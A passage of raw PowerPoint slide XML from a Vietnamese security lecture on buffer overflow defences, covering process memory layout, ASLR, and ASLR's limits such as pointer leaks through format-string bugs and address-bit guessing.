                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C59FC63-EDDD-04ED-6BD1-E3FB590FAE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4976570" y="2073800"/>
            <a:ext cx="3200992" cy="64633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Arial"/>
              </a:rPr>
              <a:t>Mở rộng để lưu trữ dữ liệu khi thực hiện lời gọi hàm</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="18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31895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p:bldP spid="67" grpId="0" animBg="1"/>
      <p:bldP spid="68" grpId="0" animBg="1"/>
      <p:bldP spid="69" grpId="0"/>
      <p:bldP spid="70" grpId="0"/>
      <p:bldP spid="71" grpId="0" animBg="1"/>
      <p:bldP spid="72" grpId="0" animBg="1"/>
      <p:bldP spid="73" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0"/>
      <p:bldP spid="75" grpId="0" animBg="1"/>
      <p:bldP spid="77" grpId="0"/>
      <p:bldP spid="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F9C9-198E-47A1-8B38-63CDA8781DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buffer Overflow – Phòng chống</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE334942-5DF8-4A4D-A36F-6D028797C811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452120" y="1021383"/>
            <a:ext cx="8229600" cy="880289"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Address Space Layout Randomization(ASLR)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A58471-B180-4B38-802C-1DFCF08A7EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE945C4-8149-43A1-801C-84FE76FDC8DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1371600"/>
            <a:ext cx="2514600"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0xffffffff</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>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D96B38-2F09-4BC8-98F3-1F8900D21B01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5734050" y="6215390"/>
            <a:ext cx="2514600"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0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00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E037757-D848-4482-A66A-94609BA7C956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5743575" y="5801380"/>
            <a:ext cx="2514600"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0x08048000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00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9C54C29-3E2E-428F-ACD2-86B5DFE34C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1657290"/>
            <a:ext cx="2514600"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0xc0000000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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D4E4D8D0-12DD-4A31-9F51-B2E08984E592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361950" y="4529688"/>
            <a:ext cx="2362200" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xác định ở thời điểm biên dịch</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Left Brace 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0422AE99-EA96-4021-80C3-B649E97E697D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="4333220"/>
            <a:ext cx="276225" cy="153418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
        <p:nvSpPr>
          <p:cNvPr id="19" name="Left Brace 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE67642-73C6-4F4A-8196-E84B4454B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2723364" y="2521802"/>
            <a:ext cx="342507" cy="17352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
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F0357C-2D72-4F29-BF57-CA7E0FEA0DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361164" y="3025914"/>
            <a:ext cx="2362200" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thay đổi khi thực thi</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74BD736-FF0B-4A3D-B047-AFDDBB18E49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2035314"/>
            <a:ext cx="2734461" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thiết lập khi tiến trình bắt đầu</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Left Brace 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18DD3611-688A-4DB0-B33D-254217EA94CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2776537" y="2064602"/>
            <a:ext cx="319088" cy="37379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
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC6C4FE-F37E-4FC9-B865-4C8C29652569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159960" y="5616714"/>
            <a:ext cx="2734461" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Không gian địa chỉ của thiết bị vào-ra</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Left Brace 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A601602E-E0FB-454D-B62A-E29FCDD449D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2803932" y="5943600"/>
            <a:ext cx="261939" cy="4039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
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0B673E-20AA-42C9-B97E-7E87D1F899B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1524000"/>
            <a:ext cx="2286000" cy="487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8" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B40108-59FD-4CCE-8C78-9C97B2DF1BAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="5910590"/>
            <a:ext cx="2209800" cy="45720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Unused</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4412706E-9E22-411F-81AB-5AD6430D7050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="1567190"/>
            <a:ext cx="2209800" cy="33781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Kernel</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8B5B49-636E-4773-B80A-BB36FFBA635B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="5393695"/>
            <a:ext cx="2209800" cy="45720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Text</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA62771E-D243-4C75-ACC9-CA1C86AE112B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="4876800"/>
            <a:ext cx="2209800" cy="45720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Data</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2C9B9B-BC65-447D-A480-A36263DCC474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="4376410"/>
            <a:ext cx="2209800" cy="45720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BSS</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5F7330-F3EE-4E39-985C-F2EB94378644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302000" y="3690610"/>
            <a:ext cx="2209800" cy="60960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Heap</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4151A71E-F5E5-4127-BEF9-4740C36F40BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="2471410"/>
            <a:ext cx="2209800" cy="45720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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Arrow: Down 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F51EF8-602F-47DA-8570-9799975951C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="2819400"/>
            <a:ext cx="838200" cy="414010"/>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Arrow: Down 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F1BF0C-E4ED-4C3F-AB83-B374D60D2750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4038600" y="3331205"/>
            <a:ext cx="838200" cy="414010"/>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Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7AFC11-800C-4E1E-AF84-65607BA5E0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331015" y="1954515"/>
            <a:ext cx="2209800" cy="467320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="7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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmdline &amp; env</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFA8805-0108-4858-9862-56E10591D90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097179" y="3254514"/>
            <a:ext cx="2827226" cy="161945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t>Nạp vào với địa chỉ bắt đầu của mỗi vùng là ngẫu nhiên</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Right Brace 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB496FA-9BAD-BD28-EF44-C49BF79E6AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2035314"/>
            <a:ext cx="229779" cy="35814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10117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18CF-A820-1805-0A6B-373F756162B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E805B2A-ED0D-A236-272F-4D11DD557B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Address Space Layout Randomization(ASLR): đặt mỗi vùng nhớ vào một địa chỉ khác nhau mỗi lần chương trình chạy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công rất khó xác định được vị trí của shellcode vì địa chỉ thay đổi mỗi lần chương trình chạy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ASLR xáo trộn vị trí của các vùng nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đặt ngẫu nhiên vùng nhớ stack: Không thể thực thi shellcode trong vùng nhớ stack mà không biết địa chỉ của stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đặt ngẫu nhiên vùng nhớ heap: Không thể thực thi shellcode trong vùng nhớ heap mà không biết địa chỉ của heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đặt ngẫu nhiên vùng nhớ code: Không thể xây dựng chuỗi địa chỉ của ROP hoặc tấn công return-to-libc mà không biết địa chỉ của code</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{508BBE9F-F05F-A912-E2AE-D7ABA31CF924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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25497594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4907-446F-6360-D1C2-CF56ED6FBD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ASLR – Hạn chế</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C3C4B3-68B6-42DD-33E5-01FE82CE26C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Giá trị RIP luôn nằm ở 4 byte phía trên SFP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Nếu chương trình có lỗ hổng xâu định dạng, giá trị của SFP có thể bị lộ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lộ địa chỉ con trỏ stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lộ địa chỉ RIP, con trỏ vtable, con trỏ hàm…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đoán địa chỉ của shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Trong bộ nhớ phân trang, mỗi trang nhớ có kích thước 4KB ~ 12 bit địa chỉ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Số bit cần đoán trên hệ thống 32 bit: 32 – 12 = 20 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Số bit cần đoán trên hệ thống 64 bit, với địa chỉ là 48 bit: 48 – 12 = 36 bit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0355C11-7764-A27F-2630-A652FDA24342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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18008099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04F3-8A0F-5A91-32C7-F1A8DB6B48C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
